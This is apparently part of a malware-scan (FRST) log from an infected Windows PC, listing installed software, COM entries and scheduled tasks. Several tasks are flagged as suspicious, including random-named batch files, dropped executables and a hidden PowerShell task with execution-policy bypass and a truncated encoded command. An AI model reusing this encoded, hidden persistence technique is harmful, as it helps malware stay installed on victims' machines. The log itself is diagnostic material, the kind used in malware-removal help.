Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AD93C7FC-914F-430E-BD55-B2C2535F4E94} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
